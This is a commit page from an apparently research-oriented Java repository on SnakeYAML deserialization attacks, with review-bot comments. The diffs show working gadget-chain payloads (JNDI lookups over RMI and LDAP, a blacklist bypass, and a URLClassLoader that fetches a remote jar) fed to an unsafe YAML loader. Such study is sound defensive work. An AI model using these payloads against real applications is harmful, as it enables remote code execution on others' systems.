
Commit 7bf8f49

committed
pr
1 parent a0596c9 commit 7bf8f49

22 files changed

Lines changed: 37 additions & 26 deletions

.DS_Store

0 Bytes
Binary file not shown.

JavaSecurity/.DS_Store

2 KB
Binary file not shown.

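--- a/JavaSecurity/SnakeYaml/src/main/java/AvailableGadgets/JndiConfigurationEXP.java
+++ b/JavaSecurity/SnakeYaml/src/main/java/AvailableGadgets/JndiConfigurationEXP.java
@@ -8,7 +8,7 @@ public static void main(String[] args) {
 String payload = "!!org.apache.commons.configuration.ConfigurationMap " +
 "[!!org.apache.commons.configuration.JNDIConfiguration " +
 "[!!javax.naming.InitialContext [], " +
-"\"rmi://127.0.0.1:1099/Exploit\"]]: 1";
+"\"rmi://127.0.0.1:1099/nprcsj\"]]: 1";
 Yaml yaml = new Yaml();
 yaml.load(payload);
 }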

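--- a/JavaSecurity/SnakeYaml/src/main/java/AvailableGadgets/SpringPropertyPathFactoryBeanEXP.java
+++ b/JavaSecurity/SnakeYaml/src/main/java/AvailableGadgets/SpringPropertyPathFactoryBeanEXP.java
@@ -6,18 +6,18 @@
 public class SpringPropertyPathFactoryBeanEXP {
 public static void main(String[] args) {
 String payload = "!!org.springframework.beans.factory.config.PropertyPathFactoryBean\n" +
-" targetBeanName: \"ldap://localhost:1389/Exploit\"\n" +
+" targetBeanName: \"ldap://localhost:1389/aprvde\"\n" +
 " propertyPath: Drunkbaby\n" +
 " beanFactory: !!org.springframework.jndi.support.SimpleJndiBeanFactory\n" +
-" shareableResources: [\"ldap://localhost:1389/Exploit\"]";
+" shareableResources: [\"ldap://localhost:1389/aprvde\"]";
 
 String poc = "!!org.springframework.beans.factory.config.PropertyPathFactoryBean\n" +
-" targetBeanName: \"rmi://127.0.0.1:1099/Exploit\"\n" +
+" targetBeanName: \"rmi://127.0.0.1:1099/nprcsj\"\n" +
 " propertyPath: Drunkbaby\n" +
 " beanFactory: !!org.springframework.jndi.support.SimpleJndiBeanFactory\n" +
-" shareableResources: [\"rmi://127.0.0.1:1099/Exploit\"]";
+" shareableResources: [\"rmi://127.0.0.1:1099/nprcsj\"]";
 
 Yaml yaml = new Yaml();
-yaml.load(poc);
+yaml.load(payload);
 }
 }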
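Review bot: After the switch to `yaml.load(payload)` at new line 21, the `poc` string built at lines 14-18 is never read, yet this commit still edits it. Either delete the unused variable or state which variant the demo loads, for example with `// only the LDAP string is loaded; the RMI string is kept for reference`. The replacement path segments `aprvde` and `nprcsj` are opaque compared with the old `Exploit`, and they recur in JndiConfigurationEXP.java and bypassBlackList.java. A one-line comment saying they are values specific to the author's local test setup would stop the next reader from guessing at their meaning.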

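--- a/JavaSecurity/SnakeYaml/src/main/java/BypassAnalyze/bypassBlackList.java
+++ b/JavaSecurity/SnakeYaml/src/main/java/BypassAnalyze/bypassBlackList.java
@@ -30,10 +30,10 @@ public String yamlLoads(String payload) {
 
 public static void main(String[] args) {
 String payload = "!<tag:yaml.org,2002:org.springframework.beans.factory.config.PropertyPathFactoryBean> \n" +
-" targetBeanName: \"ldap://localhost:1389/Exploit\"\n" +
+" targetBeanName: \"ldap://127.0.0.1:1389/aprvde\"\n" +
 " propertyPath: Drunkbaby\n" +
 " beanFactory: !<tag:yaml.org,2002:org.springframework.jndi.support.SimpleJndiBeanFactory> \n" +
-" shareableResources: [\"ldap://localhost:1389/Exploit\"]";
+" shareableResources: [\"ldap://127.0.0.1:1389/aprvde\"]";
 bypassTest bypassTest = new bypassTest();
 bypassTest.yamlLoads(payload);
 }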
Lines changed: 18 additions & 18 deletions
@@ -1,18 +1,18 @@
1-
package SnakeYamlFix;
2-
3-
import org.yaml.snakeyaml.Yaml;
4-
import org.yaml.snakeyaml.constructor.SafeConstructor;
5-
6-
public class SnakeYamlFix {
7-
public static void main(String[] args) {
8-
9-
String context = "!!javax.script.ScriptEngineManager [\n" +
10-
" !!java.net.URLClassLoader [[\n" +
11-
" !!java.net.URL [\"http://127.0.0.1:7777/yaml-payload-master.jar\"]\n" +
12-
" ]]\n" +
13-
"]";
14-
Yaml yaml = new Yaml(new SafeConstructor());
15-
yaml.load(context);
16-
}
17-
18-
}
1+
//package SnakeYamlFix;
2+
//
3+
//import org.yaml.snakeyaml.Yaml;
4+
//import org.yaml.snakeyaml.constructor.SafeConstructor;
5+
//
6+
//public class SnakeYamlFix {
7+
// public static void main(String[] args) {
8+
//
9+
// String context = "!!javax.script.ScriptEngineManager [\n" +
10+
// " !!java.net.URLClassLoader [[\n" +
11+
// " !!java.net.URL [\"http://127.0.0.1:7777/yaml-payload-master.jar\"]\n" +
12+
// " ]]\n" +
13+
// "]";
14+
// Yaml yaml = new Yaml(new SafeConstructor());
15+
// yaml.load(context);
16+
// }
17+
//
18+
//}
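Review bot: Commenting out all 18 lines disables the only example visible on this page that shows the mitigation, `new Yaml(new SafeConstructor())`, and leaves a file of dead comments in the tree. If it was disabled because it stopped compiling, the likely cause is that the no-argument `SafeConstructor()` was removed in SnakeYAML 2.0, though the page does not show a dependency change; the form that compiles there is `new Yaml(new SafeConstructor(new LoaderOptions()))`. Otherwise restore the class or delete the file outright. A fix demo is most useful when it stays runnable next to the vulnerable ones, with a short comment that the load is expected to be rejected for the `!!javax.script.ScriptEngineManager` tag.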
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
